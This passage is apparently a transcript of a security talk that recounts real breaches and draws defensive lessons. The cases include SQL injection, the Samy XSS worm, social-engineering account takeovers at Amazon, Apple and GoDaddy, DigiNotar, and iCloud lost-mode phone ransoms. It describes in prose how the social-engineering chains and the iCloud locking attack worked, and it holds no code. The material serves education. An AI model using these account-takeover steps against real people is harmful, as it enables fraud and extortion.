injection out there, it is not funny. And one of the things I'll also do on Friday is show you how to find sites with SQL injection and just how easy it is just via Google search. So number two is that it is extremely easy to exploit. If you can copy and paste, you can mount a SQL injection attack because there are free tools that just make it dead, dead simple. Because it is so simple, that's why we see kids turning up at court with their mums who are always really pissed that their kids have been hacking websites. And it's these kids that don't necessarily know anything about SQL injection or web security, but they know how to run these free tools. Now, the third thing is it is easy to exploit. Those tools have easy, easy exploits and the impact is really, really high. So if you get all your data exposed publicly, or your customers passwords, for example, that is a massively high impact. Cross-site scripting isn't great, but it's a much lower impact than something like SQL injection. So we're also seeing a lot of automation. So I mentioned that there's a tool that I'll show on Friday, very easily available tool. You copy, you paste, you put a link in your hacker website. Talk to my three-year-old how to do it, that's how easy it is. Now, unfortunately, we do have these problems because as developers, we're doing some pretty sucky things with the web. We're building these vulnerabilities into the applications. Now, we know about these things. They're in iOS, they're very well documented. We've all seen the news about how many websites get breached. But we do keep building the same risks. Now, the other thing you wouldn't have seen, possibly wouldn't have seen on the previous slide, is the URL was a.asp extension, classic asp. This is the thing that was done 12 years ago. We replaced it with.net. It was from a much more innocent era. It's not designed to be as resilient to these sort of attacks as things like modern asp.net and other modern frameworks. So running on technology that old is always gonna make things harder. It's always gonna put you behind the eight ball. So that was SQL injection. Next one I'll talk about is Matt Honan and his epic Apple hack. Now, Matt was a reporter for Gizmodo and Wired. And Matt got up one day and his iPhone powered down and consequently wiped itself, which is never good. And what eventually it was that the attackers had managed to compromise his Apple account. But how they did it is the interesting bit. So the attackers called up Amazon and they said, hi, I'm Matt. I would like to put a new credit card on my Amazon account. And they go, okay, cool, what's your name? What's your email address? What's your physical address? So three pieces of data. And then they go, okay, cool, give us the credit card and we'll put that on your account. So he does that. And then the attacker calls up the next day and says, hi, I'm Matt. I'd like to change the password of the account. And they go, okay, well, to do that, we need your name, your address, and your credit card number. Oh, interesting. So you can actually call up Amazon or you could at the time and set a new credit card and then call them back and say, I would like to verify my identity by giving you the information that I just gave you yesterday. So that allowed him to get access to that Amazon account. Now, once he had the Amazon account, he could then go through and find the last four digits of Matt's other legitimate credit cards. Not the whole thing because that would be insecure. But he could go in and see the other cards and all of us can do this on many of our accounts. Go in there and your card ends in three, two, one, five, whatever it may be. You can get those last four digits. Now, with those last four digits, the attacker could call up AppleCare and say, oh, funny thing, I forgot my password. And they go, all right, well, what's the last four digits of your credit card? Glad you asked. Here we go. So you see how he's starting to jump from one service to the other. So once he's in AppleCare, then you're into iCloud and you're into Apple's ecosystem because he's got that account. So he managed to get a temporary password, get access to the Apple account, and once you got access to the Apple account, you can start doing things like wiping devices. And we'll have a look at that in this demo as well today. So he's wiping devices. The other thing about Apple is Apple has the me.com email service. And Matt unfortunately used me.com as a password reset channel for his Gmail. So you forget your Gmail password. You add a secondary account that they can send a reset to. So he managed to reset Matt's Gmail account. So once you can reset the Gmail account, he can get into there and then he can do things like reset the Twitter account, which apparently was the ultimate goal to begin with. And the attacker went and sent a whole bunch of racist tweets and then deleted the Gmail account as well. So it didn't end up real well for Matt. And as Matt puts it, it only took an hour. His entire digital life was destroyed because the attacker basically just had four digits of a card number. So pretty nasty stuff. There's a few interesting things with that. And the first one is, and we're gonna see there's a bit of a theme today, the interlinking of accounts can be really problematic. So the fact that the attacker was able to explore the vulnerability with Amazon's verification system ultimately meant that he could take over the guy's Twitter account. I mean, that's several hops. But because we have all these things so intrinsically linked together, it often leaves us more vulnerable. There are also different views of the sensitivity of the data from different companies. So Amazon was happy to just accept something like a card and then read it back to you. But Apple, that's their verification process. So Apple had a very, very high level of sensitivity on those last four digits of the card. And it's probably got you thinking now, how many places have I got four digits of the card? If it's four digits, it doesn't come under PCI DSS, it doesn't all have to be encrypted. You can read display it back to people. It's on a lot of your receipts. Go through the garbage bin. You'll find a lot of four digits. Now the other thing is, and this was a couple of years ago, so a little bit before two-factor authentication became really popular, but there was no two-factor authentication on the Gmail account, on the Apple account, on the Twitter account. So there was no second channel beyond just knowing the passwords. That's all they take in need of the password. So where you have two-factor available, turn it on. So Apple and Twitter, I mentioned things like GitHub. A lot of people here probably use GitHub. They've got two-factor authentication. They've had brute force attacks against people's accounts. You definitely want to have it on there. And of course, the other thing is, is that as people, we are vulnerable to social engineering. A lot of security professionals say that really the people are the biggest problem. We can only do so much with the systems, and the systems will pretty much do what we tell them to do, but the people are the one that keep getting exploited by the attackers. And there are many, many different ways that we can socially engineer them. We'll have a look at a couple more throughout this preso. So who remembers MySpace? It was a thing. Some time ago, it was the thing. It was the thing in 2005 when a bloke called Sammy decided he needed some more mates. Now, for most of us, we'd try and be popular and we'd try and socialize a little bit and maybe do things that other people are interested in. But Sammy was a bit of a gun with cross-site scripting. And he decided it would be much more effective if he wrote a nice self-propagating cross-site scripting worm. Now, what it meant is he could write this worm with a whole heap of XSS. He could put it on his MySpace page. Someone comes along, they look at the MySpace page, and they automatically befriend him because there's script that he's put on the page which fires off the request to actually befriend the guy, and it puts a message on the person's page that says, and most of all, Sammy is my hero. So this was great. So people that came and saw his profile would get that on their page. But because he was a smart guy, everybody who then came and viewed their pages also got compromised. So it kind of spread. It hit a million people in less than 24 hours. That is a very, very bloody, effective cross-site scripting attack. And it looks like this. So clearly cross-site scripting can actually be rather complex. Now, the idea is not to read what's in here, but it's to make a point that this is actually pretty sophisticated. Now, this was 2005 as well. So we've well and truly moved into the space of much more sophisticated cross-site scripting attacks since then. So that was an interesting one. And it told us a few really interesting things. And one of them is that cross-site scripting is very serious. So a lot of the time when we do maybe a proof to demonstrate that a site is at risk of cross-site scripting, we'll pop up an alert box. Hey, follow this link. Oh, alert. Funny cats, whatever it may be. There's actually a Twitter account called XSSKittens. And it links all of these links to reflected cross-site scripting. You click on them, you go to a shopping website, and there's cats all over it. And he just goes nonstop because there's so much stuff out there at risk of XSS. But it can be very serious. So other proofs we often see for XSS is doing things like taking a copy of authentication tokens in cookies and sending it off to an external service because the cookies weren't flagged as HTTP only, and the XSS was enabled on the site because they weren't encoding and all sorts of other things. So it can actually be very, very serious. I mentioned before, it's also in that I was top 10. It's number three in 2013. It was number two in 2010. So it's gotten kind of a little bit better. But it's still a serious, serious problem. Now, protecting against XSS is also very easy. And this is sort of a common theme. Things like SQL injection and XSS, it's not hard to stop it if you know what to look for. So a couple of things there that make it very easy to protect against XSS is validating untrusted data. So when a user provides a URL, or say query string and parameters, or when they submit a form, or when you read request headers, when you read the language of the browser, or when you read the user agent, all of that is untrusted data. And validating that it conforms to an expected pattern is really important. In the one we'll have a look at on Friday, you can take integers and start attacking via integers because they're not actually checking that when the integer goes to the website that it is actually an integer. They just go, oh, look data. We'll take that and we'll put it in our query. Encoding all output is the other big thing. So frameworks like ASP.NET MVC do a very good job of encoding by default. So what I mean by that is if you try and send a script tag to the site and the site reflects it back, so like when you do a search and it says you searched for, instead of actually rendering script tags into the HTML source, it'll encode it. So you get amp for send less than amp for send greater than and then in your browser, you actually see rendered script tags. So they're really two very, very simple things. And again, a framework like MVC does it for you automatically. Framework like classic ASP doesn't. That's why every time you see a dot ASP extension, almost for sure you'll find SQL injection, you'll find cross-site scripting. Very easy done. All right, so HB Gary Federal. Now this was an interesting one because these guys were security professionals and they were providing services to the US government. And the bloke running that, Aaron Barr, was very proud of the fact that he believed that he had unmasked Anonymous, the ring leaders of Anonymous. And he made the mistake of telling them that he thought that he had unmasked them and they didn't take too kindly to that. So they hacked them. And the way they did it is they found a SQL injection vulnerability in the content management system of their website. This may have been one that was known already. It may be one that they found on their own. Either way, they managed to get credentials out of the database. And again, it can be really, really easy to do this. So they got usernames, emails, and they got hashed passwords. MD5 hashed passwords. MD5 hashed passwords are useless. SHA1 salted hashed passwords are useless as well. And if you're doing that, we're going to have a look at that on Friday and we're going to break a heap of them and probably upset a bunch of people. But you need to see how easy it is to break bad hashing implementations of credentials. Now, because it was just an MD5 hash, the attackers could use rainbow tables to convert the hashes back to plain text. Well, they don't really convert them. But what they do is they take these pre-computed tables where it says, for all these plain text strings, these are the MD5 hashes. And then it just matches the hashes with the ones out of the database and says, well, that must have been the password. Now, as the CEO of a serious security firm, clearly he had a very good password, which is this one just here, which is all our case with two numbers. And because it makes life really, really, really convenient, he reused it across everything. So that wasn't good. So there, the attackers have the password in plain text and it's reused across every account. So that allowed them to do things like gain, shell access to the Linux machine that their web application was running on. And then because these guys weren't actually patching their environment, exploit a risk that had been publicly disclosed, patched months earlier, exploited it, elevated privileges, and started pulling down gigabytes and gigabytes of emails and other documents and things like that off this public website. Now, the guy behind all that was this bloke, Sabu, was the handler he went under, the leader of Lowell's Sec. Now, this guy is a very, very old hacktivist. He was actually in his late 20s. So very, very old for a hacktivist. But a bunch of his mates were teenagers that did end up in court. Sabu ended up being caught by the feds. He got turned, he became a snitch. He then allegedly helped them bring down 300 other attackers or potential attackers. And in fact, just a couple of weeks ago, he finally was released with a suspended sentence after effectively having his life ruined because he liked SQL injecting some websites. So that didn't end up well for him. Didn't end up well for HB Gary either. Obviously as a security organization, if you do these sort of things and get caught, it's probably not real good for your reputation. Now, a few different things that we can take away from this. And a little bit like the Matt Honen thing before, security risks do tend to be chained. And in this case, there was a lot of pivoting. So they'd break into one system via a SQL injection attack and then get enough information to move onto the next and then get enough information to move onto the next. And we often see this happen. And one of the reasons why that's important is because I'll often hear people say, and I'll take an example, it might be that they've got a SQL injection risk in the admin section of their website. And they go, it's not really a problem because you've got to be logged on as an admin anyway. So, you know, it's okay. But it's this whole thing of not having these single points of failure. Because all of that assumes that the attacker can't get into the admin system. One person reuses a password, gets published, SQL injection gets exploited. So it's about having defense on top of defense, defense in depth. Again, we know these risks. So we know things like SQL injection. And we particularly know things like bad cryptographic storage. Using MD5, bad, using salted char one, bad. Again, I'll show you why on Friday. It's unbelievably easy to crack that. Choosing bad passwords. So it's probably obvious, but somehow we keep doing it. And even the security pros are choosing weak passwords and reusing weak passwords. And that is just opening up this treasure trove of other stuff that attackers can get their hands on. Now, the final thing about these hacktivists is that they're often young. They're often clever, maybe not particularly intelligent, but they're very, very resourceful. And when you don't have a job and you live with your mum, you've got a lot of time in your hands so they can find ways into these systems. And it's interesting when you look at the sort of discussions these kids, and often they are kids, legally, not even 18. You look at the sort of discussions they're having. So I've done some videos on things like automated SQL injection. And when I'm Googling around trying to find information, there's all these other videos that people have made about how to use tools like Havage and SQL Map. And it's just telling that every time the people on the videos have voices that haven't broken yet. True story. So they have a lot of time on their hands and they can be very resourceful. All right, Sony. So Sony had a really, really bad time of it in 2011. And they just kept getting attacked and attacked and attacked and attacked. And a lot of this started with PlayStation Network. So PlayStation Network went offline and everyone was like, where's PlayStation Network? And Sony just doesn't say anything. It just goes on and on and on. A week later they go, oh yeah, we got hacked. So it was quiet for a long time. We've been hacked but it's okay. And then they got hacked again. So the first time was about 77 million accounts. The second time was about 25 million accounts. So they were starting to have a very, very bad month of it. This was only a couple of weeks later. But it's okay, we got under control. Then they got hacked again. And this time it was Sony Pictures. Now what's interesting about this is that Sony Pictures is not PlayStation Network. This is a very different part of the organization. This is now getting into production and film studios and things like that. So clearly there was something about Sony that led to them continually getting owned over and over and over again. Now several very interesting things came out of it. And one of them is that communicating early was really important. And these guys just weren't doing it. They're literally people sitting around going, what the hell's happened? I need my PlayStation, it doesn't work. And they weren't telling people. Even eBay two weeks ago, just in the last couple of days I've had people tweet me saying, oh, eBay finally told me they got owned and I need to change my password. What does it take two weeks? I mean, I know that they've got a huge audience but they've got a lot of resources and a lot of systems behind that. So think about it for yourselves as well. For the systems that you manage, if there is an incident and none of us can assume that we'll never have an incident, if you've got a million customers, are you equipped to actually get them communication fast and early? You know, can you do it in a day or two? Are we gonna be sitting here in a week going, we're still trying to figure out how to email 20 million people? Because that can be a difficult problem to solve. Now with Sony, it was also pretty cultural. So we're looking at very independent parts of a global multinational, developers in different places, systems in different places, different technologies. Hell, it's PlayStation versus a little website somewhere for a promotional campaign. But they all kept getting owned. So clearly there was something in the organization that just didn't have a focus on security. Maybe they didn't have the training for the developers. Maybe they didn't have security reviews or penetration tests or things like that. But it was a cultural thing and you often see this become a pattern. And I particularly find it interesting, you look at a website after it's been breached and you go, well, yeah, you've got like cross-site scripting and you've got other vulnerabilities and you're returning too many headers and you've got directory browsing. You've got all these sorts of things that may not have been the way the attacker got in, but it's part of the broader picture of, hey, these guys probably aren't thinking a lot about security. A little bit of where there's smoke, there's fire going on. Now for Sony as well, it was also massively expensive. 170 million bucks apparently went in to solving their security problems. And one of the challenges we often have in security is that it's really not viewed as a feature. Not in so far as it's not something you give to customers and they use and we're gonna get an immediate sort of value in return on that. It's like an insurance policy. And a lot of companies don't like to spend on it. Even though in many cases, it's simple. Protecting from SQL injection is easy. You just gotta know where to look. Companies aren't looking at that. And I think part of the problem is that they don't see the potential downside. They see there's gonna be an immediate cost, which is to train developers or get a penetration test. But then it's gonna be sort of offset by this potential that we may lose a heap of money later on and that's hypothetical and, oh, look, something new and they move on. So being conscious that there are real, tangible costs when it goes wrong. So number six, Gorka. Gorka was an interesting one a few years ago and it was another sort of case of, in this case, Nick Denton who headed up Gorka, having a bit of argy-bargy, I think it was with 4chan at the time, the sort of precursor to Anonymous. And it was one of these sort of online ego wars, which generally don't tend to end well for the guys that are public and for the most part doing the wrong thing because the attackers don't generally tend to play by the rules. But anyway, Gorka got hacked. They had a very poor cryptographic implementation on their credentials, which made it very easy for the attackers to convert that data back to plain text. So there's nothing too unique about that, but where it got interesting was what started happening to Twitter. So why would you get Twitter spam from people who had just been hacked by Gorka? Any guesses? Reused passwords? Yes? Okay, so people reuse passwords. We touched on that a little bit earlier on with HBGarry, but this was interesting because it was a very sort of broad attack that targeted a lot of people. So clearly the attackers have got their hands on this great big dump of compromised passwords, and then they've gone on a spam campaign. Makes you wonder how complicit Asahi were in that. I don't think they'd be real happy knowing that their brand was being promoted in this way. But the interesting thing about this is it shows how we do kind of become responsible for the security on other accounts. Whether we like it or not, we're sort of implicitly responsible. So several things that came out of that, and one of them is clearly that not all cryptographic storage is equal. And when I was talking about cryptography, they talk about insufficient cryptographic storage. It's not like, do you have it or do you not have it? It's have you done a good job of it. So I know there are a lot of times where people go, oh yeah, we use cryptography or encryption or hashing or whoever they want to phrase it, and they can say yes, we've done it, and they've ticked the box and the auditors are happy and the compliance team is happy, but it's crap. They've done a really bad job. It's not all equal. As developers, we often think when we do do a good job of it, or when we do put a focus on cryptography and the way we store and handle passwords, we think that we're protecting our system. And we are, but what we've got to understand is that we do have some responsibility for protecting other people's systems as well. The other systems where these users reuse their passwords, and as much as we all like to jump up and down and say yeah, well nobody should reuse their passwords, a lot of people do. We've all done it at one time or another as well. I know none of us do it now, but we've certainly all done it, and it is something that happens. So we do have this sort of projected responsibility on these other websites. So the other thing that's a bit interesting here as well is that from Twitter's perspective, this was just people logging into Twitter. Okay, so it looked legitimate. It wasn't brute forcing. It wasn't let me take this username and 5,000 passwords and see if any of them work. It was username, password bang, straight in because they already had the credentials. But people were abusing Twitter. So I guess the sort of the question to think about there is how do you protect your system against attackers using legitimate credentials? In Twitter's case, does it really make sense to have the same spammy looking message go out 5,000 times? You know, maybe that should have set a flag off there. And finally, two factor. So two factor keeps coming up again and again and again. And two factor is the thing that saves you when the thing that we know is disclosed, but the thing that we have is not. So that is a very common theme. So the next one here is quite interesting because it sort of forces you to challenge what you think you know about HTTPS and SSL. So this was Tunisia government and Facebook. And this was a few years ago. And the story here was that at the time, Facebook would load the login page over HTTP. So you'd be looking at HTTP, call it and force it, force it, Facebook.com bang, here's a login form. Now a lot of the time people look at that and they go, oh, you're clearly not secure, right? It's not SSL. But the form posted to HTTPS. So the counter argument is, well, the credentials were protected when they were sent to the server and they're right. The credentials were encrypted when they got sent to the server. If you had have intercepted those packets, you couldn't have done anything with them. So that's good. The problem, of course, is that SSL is about much more than just encryption. So there's only three things I talk about with SSL. And one of them is authenticity. So when you go to a website and you see a padlock in the address bar and you can inspect the certificate and you can see it says Facebook.com, you have a pretty high degree of confidence that it is Facebook. And just by the by, if you put a bitmap of a padlock icon somewhere in the web page, that doesn't make it secure. That's a fricking bitmap. It's not the same as the one that's in the address bar. People do that, believe me. So that was number one, authenticity. Number two is integrity. So when you load something over an HTTPS connection and SSL does its thing, you can have confidence that the content of the page hasn't been manipulated. And that's where it went wrong with Tunisia because it wasn't loaded over HTTPS. You could have no confidence that the page hasn't been manipulated. We're gonna do this Friday as well. We're gonna find a nice site that does that and steal credentials in an ethical way, mostly. And finally, it is also about confidentiality. So the third point was, you do get your data's protected when it goes over HTTPS. People can't actually read what is in there. Now the interesting thing is, is that here's what happens. So this is the way the attackers, and in this case, the attacker is the nation state. This was before we were worried about the Americans, who we know like doing a lot of this sort of stuff, like most other big governments, no doubt. Anyway, what they were doing was they were putting this JavaScript in the page. It doesn't matter too much the detail of this, but what was quite tricky about it is that they were forcing an asynchronous request on submitted the credentials. And that asynchronous request was actually going off to facebook.com, but it was appending the credentials in an encoded query string, and it was also sending them to an HTTP address on facebook.com. And because it was going to an HTTP address, the attackers, the government, could view the contents of it. But if anyone else looked at it, they'd go, what the hell is Facebook doing? Oh, it looks encrypted, of course it's not, it's encoded. Looks okay, but it is going to Facebook. So it was a nice sort of tricky little way for getting around that. Now, there's a few different things that we can take out of this. And one of them is that a little bit like cryptography, SSL is not a have you done it or have you not done it, it is have you done it right. So you cannot load anything over an HTTP connection and not expect it to be manipulated or observed. So you cannot load login pages over HTTP without expecting them to have been changed. You cannot let people view an authenticated page and send an auth cookie over an HTTP connection without expecting it to be sniffed and the session hijacked. So there are nuances to the way that SSL is done that make it very, very easy to do it insufficiently. And this is what I was talking about, they say insufficient transport layer protection. So there's like this degree. And there are certainly degrees of making it even more secure again. So does anyone see fire sheep a few years ago? Man, that was fun. So what fire sheep did is it was a little plug-in to Firefox. And the idea was that you could go into an internet cafe with your laptop. In fact, you could go into here. This place is great because there's no encryption on the wireless. So apparently what you could do here is you could use fire sheep. And what it would do is it would look at the network traffic around you because when you're not on an encrypted network, it is possible to observe other packets on the same network. And it would look for packets. It would look for requests being made to Facebook where the authentication token was being sent over an HTTP connection. And because it was a very nice plug-in and very user-friendly, you'd load the web browser and you'd get a list of all the people in the cafe. You get the photos. So you could look around you and go, oh, there's that guy. Here he is on Facebook. And you could click on him and steal their session because the cookie wasn't protected. So fire sheep was a bit of a watershed moment where people started going, OK, we know we could do this. But when you see it packaged together so nicely and made so easy, yeah, maybe we'd better actually take a little bit of attention and fix it, which is what Facebook has done. Because now everything on Facebook is SSL. Certainly anything that needs to be secure is sent over HTTPS. And I guess that's a good question for you to go away with as well. In your own assets, what are the things you're doing over HTTP that may put you at risk? And again, the classics, loading a login form over HTTP, sending cookies that are not flagged as secure, and they're auth tokens. So if that's a foreign concept, that's one of the things I'll talk a lot about in the PluralSite courses, looking at things like HTTP only, secure attributes of cookies. Because if you don't have those two things, you've got a whole world of potential trouble. Did you note a rest in peace? Did you note that it was a Dutch certificate authority? And a few years ago, did you know it got owned rather seriously by some attackers that managed to start issuing rogue certificates? So the whole premise of this sort of public key infrastructure of certificate authorities is that they're a handful of trusted ones. And they have the ability to issue certificates under certain organization's name. So any of us can go along to somewhere like VeriSign. If you want a free one, go to start SSL. You can get a free certificate, and they will verify your identity, and that you own the domain, and then they'll give you a certificate. What that means is that you can stand up a website, you can make it HTTPS, you can serve that certificate up, and that will give people confidence that you are who you say you are, and everything gets encrypted so it can't be observed or manipulated. Now when an attacker compromises a certificate authority, they can start creating certificates for whoever they like. And these guys decided that they liked Google. So they created certificates for Google. They created certificates for some of the other big ones that Google has. But Google was the really prominent one, because once you can create a certificate for Google, if you can get in the middle of the traffic, then the client still sees an HTTPS connection, still sees a valid certificate by a valid CA, but the person who's doing the man in the middle of attack can intercept all the traffic. And of course that means they can change it or read it. So what was observed when all this washed up, and the guys did start looking at what was happening inside DigiNotar, is they noticed a whole heap of certificate validation checks coming from Iran. They called OCSP checks, and they make sure that the certificate hasn't been revoked. Now DigiNotar was not the CA for Google. So of course the question is, why are we getting OCSP requests for Google from Iran? There should not be a DigiNotar certificate for Google. So chances are it was the government. And a little bit like the Tunisia situation, I guess we could expect that it might happen somewhere like Iran. Government gets control of the connection. Government gets a compromised certificate from DigiNotar somehow, signs their own traffic, and for all intents and purposes, makes it look like a legitimate connection. You get the padlock, the real padlock, not the bitmap, and the government gets all of the traffic. So good for the government. Not so good for DigiNotar, because when you are a security company and you base your entire operation around being a secure certificate authority, and then you're not, you go bankrupt. So it didn't end real well for DigiNotar. Really bad for the Dutch government too, because the Dutch government was very, very dependent on their local CA, which you can kind of understand, but in retrospect, maybe not such a good idea. Komodo also had similar sort of issues. Looks like the same attacker, but Komodo didn't ultimately go under. They weren't owned quite as badly. So a few things here. We do depend on certificate authorities as sort of the fabric of SSL. So we put our trust in the fact that when we see certificates, things are valid and we can trust the connection for the three reasons I mentioned. But certificate authorities can get owned. It does happen, and it's a big event when it happens. I mean, DigiNotar was serious, serious stuff, but it does happen. We have also seen other attacks against SSL. Beast and Crime, most recently Heartbleed. Heartbleed wasn't really an attack against SSL per se, but it was a vulnerability in open SSL. So if you're trying to implement SSL on your application and you used open SSL, which is on about two-thirds of machines on the internet, then you potentially had problems. So some of the things that we can do as well to protect against vulnerable implementations of SSL are things like cert pinning. So for example, if you use Google Chrome and you go to Gmail and the Iranian government, let's imagine you're in Iran, Iranian government has owned your connection and they got rogue certificates. If they don't serve up the right certificate with the right thumbprint that Google Chrome expects, so Google Chrome has that certificate pinned, then it throws its hands up and says, no, there's something wrong, we're not gonna give you any data or anything like that. Often see this in mobile apps with banks as well. It has a very easy way to check. You can proxy your traffic through Fiddler, you can install a self-signed certificate on your device, and you can look at that traffic, and a lot of banking apps will say, no, this isn't any good, even though the certificate chain is valid because it is not the right thumbprint, you're out of here. We'll have a look at that on Friday as well, we're gonna proxy some traffic and see how that works. What is a little bit difficult there though is you can't really do it on your own website. So it works for Google with Chrome because they own the client and they own the server. Most of the time when we build web apps, we don't own the client. We're depending on people using whatever browser it is they use and we can't actually pin certificates there. PFS or Perfect Forward Secrecy is another good example of how it can be strengthened, where instead of having one private key that signs everybody's traffic, effectively every connection gets its own private key and if you have a heart bleed and keys are leaked, it doesn't put everybody at risk. And there's a really, really pragmatic, easy piece of advice here as well, which is don't have stuff you don't need to. The number of times people have got data classes that they have to store in the database and protect in transit that they never need is nuts. I have this discussion often, things like do you really need people's religion? What are you gonna do with people's religion? This is sensitive personal information. Not the sort of stuff you wanna leak. If you don't have it, you can't lose it. And finally, clearly in a case like did you know that, it can be game over. And a tag like this can be the end of the organization. Not just 170 million bucks like Sony got hit. And I guess 170 for Sony maybe isn't, I mean it's notable, but it's not a whole lot. It can actually bring you down entirely. So it didn't end well for did you notar. So a more recent one, so the Twitter at N account. This was one that happened a little bit earlier this year. Now apparently single digit or single character Twitter accounts are very valuable. This guy said his account was worth 50 grand. People had offered him $50,000 for his account. I guess you can kind of imagine it. You've only got about 140 characters. If you have a one character, maybe it's like number plates and the really short ones are valuable. So anyway, this account was very valuable and an attack out wanted to take his account. So he did it by hacking the guy's GoDaddy account. Now the reason why that works is first of all, the guy managed to call up PayPal, social engineer PayPal and get the last four digits of the credit card. Now he never disclosed how he social engineered PayPal to get that, but I think we've seen enough examples to understand that that's well and truly within the realms of possibility. So he's got the last four digits of this guy's credit card. So then he calls up GoDaddy and says, look, I've been locked out of my account and my email address and stuff has changed and I need to verify my identity. And GoDaddy says, okay, well give us the last six digits of your credit card account. And the guy goes, well I've got four. And GoDaddy says, well, you do want to guess? Just guess the other one. Is it one? No. Is it two? No. Is it three? Yeah, three. Okay, what about the other one? And then they just let him guess. So GoDaddy is just like, keep giving out free chances. So good on GoDaddy. Now what ended up happening was the guy got access to the GoDaddy account. He went into this victim's GoDaddy account, changed all the contact details. So no longer does the GoDaddy account look like it belongs to the victim. Email addresses, names, physical addresses, contact details. And then he contacted the legitimate owner of the at-n account and said, give me your at-n account or I kill all your domains and I delete your websites and I do all the other stuff I can do when I have control of your DNS. And this guy was trying to get in touch with GoDaddy and said, look, it's me. Can you give me the account back? And they go, well, it's not you. Our record say you're, that guy over there is just stolen your account. Because we let him guess your bloody credit card number. So this was a really sort of interesting social engineering attack against GoDaddy. What's interesting when we look at GoDaddy, this is today, it was two weeks ago, I assume it's still the same today. So what's wrong with this? Where's the HTTPS? No HTTPS? It posts to HTTPS, but we know from Tunisia that that's not sufficient. Now on the plus side, with GoDaddy, you can get two-factor authentication. Actually, you probably can't and I probably can't because you've got to be American to get it. So they've got two-factor authentication, but unless you're in that small percentage of the worldwide internet populations in the US, you can't use it. So GoDaddy, not so good on a couple of fronts there. So the things that we get out of this is that again, we're getting into this sort of thing where it's you're pining one account and then you jump to the other one and you've got that and you've got that. And in this case, it was actually a ransom. You know, it's not even like he managed to pivot. But we do see compromising one accounts leading to this cascading effect of other accounts being compromised. Untrustworthy humans again. Guessing credit card numbers? That's nuts. Come on. Who lets you keep guessing? That's crazy. Actually, I'll tell you who lets you keep guessing. Quantas lets you keep guessing and I'll show you on Friday. That's another topic. Two-factor authentication, we just keep going through this again and again and again. It's nice that GoDaddy has it. It's bad that nobody outside the US gets it. Inevitably, that's where their predominant audience is. But give it to other people. I mean, geez, everyone else can figure it out. You can get it on Twitter and Facebook and everything else. Why can't you get it on GoDaddy? Now, Twitter also really wasn't very helpful. Twitter should have sort of done the mass after he'd given the account away and said, well, actually, yeah, we can see this is your account and here's the paper trial of everything that happened. Here you go. Have it back. And they, by all accounts, were pretty useless. Eventually, they came to the party and they did give him his account back after he'd surrendered it to the attacker. But it took him a long time. And I guess the lesson there is it is a free service. Even if it's a valuable single character account, it's a free service. How much support do you actually expect from Twitter? Last one I thought we'd look at is very topical. So this was just last week. And this is what a lot of people in Australia woke up to last week. And they were woken up to this at about 2 AM in the morning for many people. And allegedly, as you can see here, Oleg Pliss has locked their phone. And he's done all of this remotely and he's now demanding money. He's demanding a ransom. A lot of sort of everyday mum and dads in Australia got hit by this, certainly hundreds. I don't know quite how they're going to figure out how to use MoneyPak or Ucash or PaySafe card when their phone is locked. And it may be the only thing they have. But somehow, Oleg or whoever it is who was impersonating Oleg was expecting them to know that. So let me explain how he actually did this. So I've got to thumb in my blog from last week, breaking this down, showing you how an attack like this works. So the first thing is the attacker logs into their iCloud. Now, how the hell does an attacker log into an iCloud? That is a question that is not yet answered. For some reason, a bunch of Australians and some people from overseas as well, but very predominantly Australians. And Australia has less than 1% of the global internet audience. So I don't know why we featured so much. But somehow, the attacker has got enough information to log into the victim's accounts. So for example, it may be that we had an Aussie service compromised last week. And it may be that the attacker got a whole bunch of localized usernames and passwords and then just started going through them, holding them all for ransom. Now, he may have automated the whole thing much more than this. But this is how you would manually go and hijack someone's account. So on the right-hand side, we have the attacker. So he's pulled out his iPhone or his iDevice or whatever it is he's got. And he's logged onto the victim's iCloud account. That allows you to see where their device is. So here, I've got my attacker hat on, and I'm looking at Troy's iPhone. And I want to hijack that device. So what I do is I start a lost mode process. So if you've got iCloud and iOS devices and you've used Find My Phone, you may have seen this before. The theory is that if you legitimately lose your phone, you can see where it is on the map. And then you can turn on lost mode. Now, when you turn on lost mode, you can set a pin on the phone. Now, you can only do this if the phone doesn't already have a pin. So all of these people that got owned by this attack last week didn't have a pin on their phone, which means the attacker can enter their own pin into the lost phone mode. Now, when they do that, they can also put in a phone number. And the theory is that if you legitimately lose your phone and someone picks it up, they see a message, which is normally a lot friendlier than the one you see here on the left side of the screen. And they see a phone number that they can click on and use your phone to call your wife or your husband or whoever it may be at home on their other phone. That's the way it's meant to work. This guy was using it as a code, which he inevitably wanted to accompany the payment so that he could verify who had actually paid him. And then in theory, unlock the phone. I don't like the chances of you ever getting your phone unlocked by the way, if you send money to someone called Oleg Pliss, who has just held your phone to ransom. So anyway, he'd put a number on. And then he would put a message like this. Now, after adding the message, he could also hit the great big play sound button, which means that whether the phone is on mute or whether the volume's turned all the way down, doesn't matter. The phone would go absolutely nuts. And all these people being woken up at 2 AM in the morning with their phone irretrievably locked. You cannot unlock it short of a vulnerability in iOS, of which there have been a whole heap at different times. But it's probably not the sort of thing that mum and dad are going to be able to sort of circumvent and get their phone back online. So incidentally, the only thing that people could do is restore from backup. So they could restore, say, from a local backup of iTunes. They could just blitz the device and restore from iCloud if the guy doesn't actually destroy their entire iCloud account. You can't remotely unlock. So even if you've still got access to your iCloud account, you can't unlock this phone by sort of reversing the process and turning off lost mode. Once the pin is set, the pin stays there. So actually, I mean, the guy's kind of ingenious. It's a reasonably good attack in terms of the ease and the effectiveness. Now clearly, there were a few things that came out of this. So one of them being security basics. This was hard stuff. So there are multiple things that consumers had to have not done in order to fall victim to this attack. If they had done any one of these next three things I'm going to read off, it wouldn't have been a problem. So one of them was they almost certainly reused passwords. Apple released a statement about this. And as Apple is prone to do it, it was very curt and very direct and said, don't use passwords. Please go away. It was something to that effect. It was basically saying, look, we don't know. It's your fault. I suspect they actually know a lot more than that. I mean, they see this happen inevitably on the back end. But they've put it down to password reuse. So number one, password reuse. At number two, they didn't have pins on their devices. Even just a four-digit pin, and it would have been OK. So I don't know. Maybe it was that they were giving it a little site. iPads, and it's the kid's iPad. But I've got little kids, and I tell you, well, they can figure out a four-digit pin pretty easy. So that shouldn't be a barrier. And the third thing was no two-factor authentication. If there was two-factor, this must be the fourth time we've said this now. If there was two-factor, assuming this is the way the guy got in and there wasn't some unknown vulnerability in iCloud, this could not have happened. Now, iCloud is enormously convenient, and hackers love it. They loved it with Matt Honen because they could wipe his devices. They love it with these sort of people as well. This is why someone probably sitting in the Eastern Block summer in Europe is able to wake up Aussies at 2 AM and lock their phones. It is enormously convenient. Of course, the reality of it is, if the attacker has access to iCloud, they could have also taken the backups that go to iCloud, because backing up to iCloud is so convenient. It's also convenient for the attacker. He could have taken those backups, restored them to his device, accessed 